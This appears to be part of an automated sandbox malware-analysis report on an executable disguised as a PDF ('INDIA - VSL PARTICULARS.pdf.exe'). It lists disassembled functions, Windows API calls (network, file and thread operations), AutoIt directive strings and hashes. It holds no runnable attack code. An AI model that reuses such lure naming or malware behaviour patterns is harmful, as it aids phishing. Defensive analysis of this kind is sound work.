                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                              • String ID: H
                              • API String ID: 3613100350-2852464175
                              • Opcode ID: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                              • Opcode Fuzzy Hash: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                              Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                              • String ID:
                              • API String ID: 1291720006-3916222277
                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                              Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                              • IsMenu.USER32(?), ref: 0045FC5F
                              • CreatePopupMenu.USER32 ref: 0045FC97
                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                              • String ID: 0$2
                              • API String ID: 93392585-3793063076
                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                              Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                              • VariantClear.OLEAUT32(?), ref: 00435320
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                              • VariantClear.OLEAUT32(?), ref: 004353B3
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                              • String ID: crts
                              • API String ID: 586820018-3724388283
                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                              Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,0040F545,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,004A90E8,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,?,0040F545), ref: 0041013C
                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                              • _wcscat.LIBCMT ref: 0044BCAF
                              • _wcslen.LIBCMT ref: 0044BCBB
                              • _wcslen.LIBCMT ref: 0044BCD1
                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                              • String ID: \*.*
                              • API String ID: 2326526234-1173974218
                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                              Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                              • _wcslen.LIBCMT ref: 004335F2
                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                              • GetLastError.KERNEL32 ref: 0043362B
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                              • _wcsrchr.LIBCMT ref: 00433666
                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                              • String ID: \
                              • API String ID: 321622961-2967466578
                              • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                              • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                              Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                              • API String ID: 1038674560-2734436370
                              • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                              • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                              • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                              • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                              Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                              • __lock.LIBCMT ref: 00417981
                                • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                              • __lock.LIBCMT ref: 004179A2
                              • ___addlocaleref.LIBCMT ref: 004179C0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$pI
                              • API String ID: 637971194-197072765
                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                              Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove$_malloc
                              • String ID:
                              • API String ID: 1938898002-0
                              • Opcode ID: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                              • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                              • Opcode Fuzzy Hash: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                              • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                              Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                              • _memmove.LIBCMT ref: 0044B555
                              • _memmove.LIBCMT ref: 0044B578
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                              • String ID:
                              • API String ID: 2737351978-0
                              • Opcode ID: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                              • Opcode Fuzzy Hash: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                              Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                              Download Yara Rule
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 0041523A
                              • __calloc_crt.LIBCMT ref: 00415246
                              • __getptd.LIBCMT ref: 00415253
                              • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                              • _free.LIBCMT ref: 0041529E
                              • __dosmaperr.LIBCMT ref: 004152A9
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 3638380555-0
                              • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                              • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                              Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorInitLast
                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                              • API String ID: 3207048006-625585964
                              • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                              • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                              • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                              • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                              Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • inet_addr.WSOCK32(?), ref: 0046559B
                              • gethostbyname.WSOCK32(?), ref: 004655A6
                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                              • _memmove.LIBCMT ref: 004656CA
                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                              • WSACleanup.WSOCK32 ref: 00465762
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                              • String ID:
                              • API String ID: 2945290962-0
                              • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                              • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                              • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                              • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                              Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                              • String ID:
                              • API String ID: 1457242333-0
